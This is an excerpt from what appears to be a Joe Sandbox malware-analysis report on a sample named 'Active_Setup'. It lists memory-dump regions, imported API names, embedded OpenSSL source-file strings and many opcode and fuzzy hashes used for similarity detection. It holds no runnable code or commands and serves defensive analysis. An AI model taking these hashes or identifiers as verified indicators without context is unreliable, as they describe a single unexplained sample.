                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 1646373207-4269328691
                                                                                                                                                  • Opcode ID: 5e287de6ad97641d0ef96bdd8b8bc8214a95e38088af995252e906dc88699a8b
                                                                                                                                                  • Instruction ID: 701f2978f8eacad2af951a0caeb5ef0136322d1ed05134ad8caa71ef4908ebd2
                                                                                                                                                  • Opcode Fuzzy Hash: 5e287de6ad97641d0ef96bdd8b8bc8214a95e38088af995252e906dc88699a8b
                                                                                                                                                  • Instruction Fuzzy Hash: 5662EE329143258FD768EF76EC9B1AA37A2FB90310346822ED4C29794DDF3F54429B85
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ....................$.\crypto\rand\md_rand.c$You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html$gfff
                                                                                                                                                  • API String ID: 0-3960724764
                                                                                                                                                  • Opcode ID: dfc4ae825ba715ca2b9bb6ff448c9d582495231be485c5e3dfde1473d1e681a4
                                                                                                                                                  • Instruction ID: ac7a77b7410e0dba0902f5ae8c3a760902d2662bb70277e6b9d94ecfe3e7e6c7
                                                                                                                                                  • Opcode Fuzzy Hash: dfc4ae825ba715ca2b9bb6ff448c9d582495231be485c5e3dfde1473d1e681a4
                                                                                                                                                  • Instruction Fuzzy Hash: FAD1A071E083856BD310EF22EC42B5BB7E5BBA4750F48451CF9C0DB286E6B6D504D792
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 0-4269328691
                                                                                                                                                  • Opcode ID: a009725d6c6b83f15a9a2431d2f75f500ad0bdaeedb350605e0d429a79693e97
                                                                                                                                                  • Instruction ID: 7b43de82aaf70e3e9ede90909389d9129018475550fee2700906f739f0757e70
                                                                                                                                                  • Opcode Fuzzy Hash: a009725d6c6b83f15a9a2431d2f75f500ad0bdaeedb350605e0d429a79693e97
                                                                                                                                                  • Instruction Fuzzy Hash: 965222739003218FD368EFB6E89B16A37A2FB90310346862ED4C297D4DDE3F54469B81
                                                                                                                                                  APIs
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 190572456-4269328691
                                                                                                                                                  • Opcode ID: df4561edf3dd51ea95bcf869f987ff07ebcc5b320ba550187f42f6281c322c60
                                                                                                                                                  • Instruction ID: 51094818a950ca8bdfb931aa018b42d3846518724b92aeb5dc933b9b4c835cea
                                                                                                                                                  • Opcode Fuzzy Hash: df4561edf3dd51ea95bcf869f987ff07ebcc5b320ba550187f42f6281c322c60
                                                                                                                                                  • Instruction Fuzzy Hash: A43215739043258FD368EFB6E99B16A37A2FB90310346822ED4C297D4DDE3F54469B81
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __time64
                                                                                                                                                  • String ID: .\ssl\s23_clnt.c
                                                                                                                                                  • API String ID: 399556195-2564810286
                                                                                                                                                  • Opcode ID: 4bcefde38f651fc132ff71b6ac24ef98d458da19a2a322c5870bf1a1f34894a4
                                                                                                                                                  • Instruction ID: dd40ed333005acf929bb3ce6aa9e5251c63e9bee5604a9d03e418d5f39a82f10
                                                                                                                                                  • Opcode Fuzzy Hash: 4bcefde38f651fc132ff71b6ac24ef98d458da19a2a322c5870bf1a1f34894a4
                                                                                                                                                  • Instruction Fuzzy Hash: 67F15771A083429BE750CF28DC81B9BBBD4AF94304F0846ADFDC95B382D7799645C7A2
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: _memset
• String ID: .\crypto\rsa\rsa_oaep.c
• API String ID: 2102423945-3887057465
• Opcode ID: 88d907d9887fcfae1a8daac189588c75731781bdb34efdd3e60f5b403000d615
• Instruction ID: c283ede7cc67cfdfc34f5a0c39324ace0cf556c2591b2155d8dc0d7764c98716
• Instruction Fuzzy Hash: 8591E3B56083429FD321DF29CC81BAFB7E5ABD4700F044A1DF9D9D7245EA78D9088B92
Similarity
• API ID: _memset
• String ID: .\crypto\rsa\rsa_pk1.c
• API String ID: 2102423945-3529532903
• Opcode ID: ee371d05a469a9293c8cf0ebcb8558a74f06c5657627898adb86b4417eff46e8
• Instruction ID: 3dd7906b475df49520c31d9208375123a41bd2dd2b3c1731513a6490169c3572
• Instruction Fuzzy Hash: 43417A726483071BCB04DE79CC82A6FB7D1ABC4714F044B2DF6E5EA2C1DBB895098691
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: 672225bd1b0277f4638c4f9cf35b20453bda88d70b63d7ff7710b99eaa5e5ea6
• Instruction ID: 74ca1c57546f2fc682c0f71682114292c1261de2eaf54aa9397855de6a11990b
• Instruction Fuzzy Hash: 5FF1C33174A7C14FD34AC6AC88D4355BFD2DBAF200B4986BCDAD6DB793C4A1581AC3A1
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: 1d2708f37aa2f261f0cf60b9237770fdb9201351f602ae492e714525f66bbd93
• Instruction ID: 5eb17e63f1829fb0c461a0e83ccc6d6fcede0ea2b088b28b866cf281e4b63942
• Instruction Fuzzy Hash: 97A1B42564E7C18FD35EC62E588466ABF828FFB100754C6DCC8D6DB79AC860981AC7B1
Similarity
• API ID:
• String ID: .\ssl\d1_pkt.c$SSL alert number
• API String ID: 0-1269415402
• Opcode ID: cc726c9a1945f6522e3dfdde88fc88b2641717a634c7ac5c05baba4125c18f7d
• Instruction ID: 826c33fbbf5eff55dd6b16546998be4b0b9da4fb53901ba1878a7a1d533ac8a4
• Instruction Fuzzy Hash: 2A322770E04302AFE760EF18DC89BBAB7E5BB40718F04857EE6C58A682D775E451C786
Similarity
• API ID:
• String ID: .\ssl\s3_pkt.c$SSL alert number
• API String ID: 0-2841557993
• Opcode ID: bf10c812ee119eabfdf5b75344a0cdbd8c2be664d90e72aec57f09c36757a711
• Instruction ID: 2636fe5b8f3d026be779455847d7dd6b8d62ed9293a0326c606d33ddc12f8c75
• Instruction Fuzzy Hash: 633208B06007419FE761DF18CC85BA777D9BF45308F4485BEE6CA4BA82D775A884CB82
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2102423945-0
                                                                                                                                                  • Opcode ID: 174d85eff5cb0369d2a37d26b47dad4842119fc12be48149e06c3cefba4ae949
                                                                                                                                                  • Instruction ID: b59d8de7b12873324443b890196334512246a3773520973747badc20dfe9dc81
                                                                                                                                                  • Opcode Fuzzy Hash: 174d85eff5cb0369d2a37d26b47dad4842119fc12be48149e06c3cefba4ae949
                                                                                                                                                  • Instruction Fuzzy Hash: A741E32424D7D25FD34FC62E1C8066A7F969FBB100B08828CD8E6DB78BC8649856C7B1
APIs
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: 5c22931b05927dece94f3ca13df0372ce473ae10a5e0336b4a1bcba089ac3251
• Instruction ID: 0ff623f9943fa148548c1e4e457955a15bae8902fa43998069a7b2b1e4057236
• Opcode Fuzzy Hash: 5c22931b05927dece94f3ca13df0372ce473ae10a5e0336b4a1bcba089ac3251
• Instruction Fuzzy Hash: 1441055024D3D29FD30ACA3E1C8066A7F96DFB7100B0886DCD8E69BB87C5649856CBF1
APIs
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: deb79e9921de75d13cccab7d59ac78c1792801cda007d19ae9ec0ea2d53d0c63
• Instruction ID: 235b676540fbb71838ef0b45c16e4d53c729d4325f6e13afd6c0353ec68d4646
• Opcode Fuzzy Hash: deb79e9921de75d13cccab7d59ac78c1792801cda007d19ae9ec0ea2d53d0c63
• Instruction Fuzzy Hash: 4341065020D3D29FD31B8A3E0C846667F96DFB7100B4886CDE8E69BB87C564A856C7F1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID:
• String ID: ....................$.\crypto\rand\md_rand.c
• API String ID: 0-2607670410
• Opcode ID: 1173637edb8f05a070811d337376c5b204b875ad69d9fadb786190dcc1442a58
• Instruction ID: 491636f02f58bc688ae9b4215b38cc41331d59a4d4441063587aabca8207daa5
• Opcode Fuzzy Hash: 1173637edb8f05a070811d337376c5b204b875ad69d9fadb786190dcc1442a58
• Instruction Fuzzy Hash: BD917C71A083C45BC310EF22EC82B5BB7E5BBA4754F48491CF9C4CB286E675D608D792
Strings
• .\crypto\asn1\evp_asn1.c, xrefs: 0100B442
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID:
• String ID: .\crypto\asn1\evp_asn1.c
• API String ID: 0-785157549
• Opcode ID: 14edd852d55ad05b49660678374440c0b8312da28e3a6a6b04326f077c0db855
• Instruction ID: 3621b947e0471e2593767cf1295f7aec8610aa94f1fde23a170a78f97b6f8183
• Opcode Fuzzy Hash: 14edd852d55ad05b49660678374440c0b8312da28e3a6a6b04326f077c0db855
• Instruction Fuzzy Hash: EB222D75A083148FD358CF59C48061AFBE2BFCC314F1A8A6DE99897361D7B1E906CB85
APIs
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: 1dd56703d9bedcab792e325d7954ba05003b40cb504d6b16a78062c2edd00a0d
• Instruction ID: 2968a3d982eb3b9d9099b365238056f8df2aead485a3e02a085775ec0a8773e1
• Opcode Fuzzy Hash: 1dd56703d9bedcab792e325d7954ba05003b40cb504d6b16a78062c2edd00a0d
• Instruction Fuzzy Hash: 4A61DD72A083808FD755DB28C890AEFBBE5ABD6200F444E5DF5DAC7202D630D909CB56
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9e4520900187c0339e1c6be9f6aee4c1f13aeb2074ad1eae4d290c6f14a18676
• Instruction ID: f55da0a45b2b39b7fc037f501def5192ee863256e19359332dca4eaab0c1042a
• Opcode Fuzzy Hash: 9e4520900187c0339e1c6be9f6aee4c1f13aeb2074ad1eae4d290c6f14a18676
• Instruction Fuzzy Hash: 4F61D4715087419FC315CF28D880A6BBBE9BFC9210F484A2DF5DA87652DB30E948CB96
APIs
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2102423945-0
                                                                                                                                                  • Opcode ID: d0898076c1847621966bb8c82a04dc8268533b91a5cf0846fffc13ed5d36372d
                                                                                                                                                  • Instruction ID: 91587af07b189a0af9dbc664cedad52e0b01bd06d496e35584129ca2d445648d
                                                                                                                                                  • Opcode Fuzzy Hash: d0898076c1847621966bb8c82a04dc8268533b91a5cf0846fffc13ed5d36372d
                                                                                                                                                  • Instruction Fuzzy Hash: 0D616B716087419FD719CF28C480A6BBBE9FFD9204F448A6DF4DAC7251D634EA48CB92
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2102423945-0
                                                                                                                                                  • Opcode ID: 8ad2b919972cacacbbfa6722806b11f18e496c23009281da4eb142bcf5632998
                                                                                                                                                  • Instruction ID: 6c280ca981cfb5fcfd264ff17f4688040f20a4a16c5c0036f7b00fe92371ff67
                                                                                                                                                  • Opcode Fuzzy Hash: 8ad2b919972cacacbbfa6722806b11f18e496c23009281da4eb142bcf5632998
                                                                                                                                                  • Instruction Fuzzy Hash: 9C519D756087819FC319CF28D49096BFBE9BFD9214F048A2EF5DAC7241D634E909CB92
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .\crypto\asn1\a_object.c
                                                                                                                                                  • API String ID: 0-1678179117
                                                                                                                                                  • Opcode ID: f871ba6a3567e8b96de8c29587b080f940c6b2e44efa60e770f156cff01d79a9
                                                                                                                                                  • Instruction ID: bc351160ba0bcfaf24f2882e9b8aac08576e6561ce94864bbe22189a741ef6ef
                                                                                                                                                  • Opcode Fuzzy Hash: f871ba6a3567e8b96de8c29587b080f940c6b2e44efa60e770f156cff01d79a9
                                                                                                                                                  • Instruction Fuzzy Hash: 7AA14772B043C14BD720DA27CC81B2BB7D6BFD0710F54092EFA858B281EA79D949D792
                                                                                                                                                  Strings
                                                                                                                                                  • .\crypto\asn1\evp_asn1.c, xrefs: 0100B442
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .\crypto\asn1\evp_asn1.c
                                                                                                                                                  • API String ID: 0-785157549
                                                                                                                                                  • Opcode ID: 3506d525364c7bb94e015792d90ca73624e946c0f4d1ea5a8875a1e41d064e00
                                                                                                                                                  • Instruction ID: f4bc30ecaa6fe5d8525fbe699bc7b1798f87116b5880ad600314a515c4ef6e0f
                                                                                                                                                  • Opcode Fuzzy Hash: 3506d525364c7bb94e015792d90ca73624e946c0f4d1ea5a8875a1e41d064e00
                                                                                                                                                  • Instruction Fuzzy Hash: D1B13272A083148FD358CF59C880A1AF7E2BFC8314F5A866DE99897352D771EC16CB85
                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000DC70D), ref: 0108C754
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: 21a3e74e02e80ac1becaf609325be65b894b1197fccd39cb2327817cee2ad17b
                                                                                                                                                  • Instruction ID: 26017a0d2bb75e4d94efe4e025e068b88794b153f8538fd06f071b2dc6c26468
                                                                                                                                                  • Opcode Fuzzy Hash: 21a3e74e02e80ac1becaf609325be65b894b1197fccd39cb2327817cee2ad17b
                                                                                                                                                  • Instruction Fuzzy Hash: 2A9002F025560146561037B1991948539E07A5D6327411466A0D1C800CDB5540505761
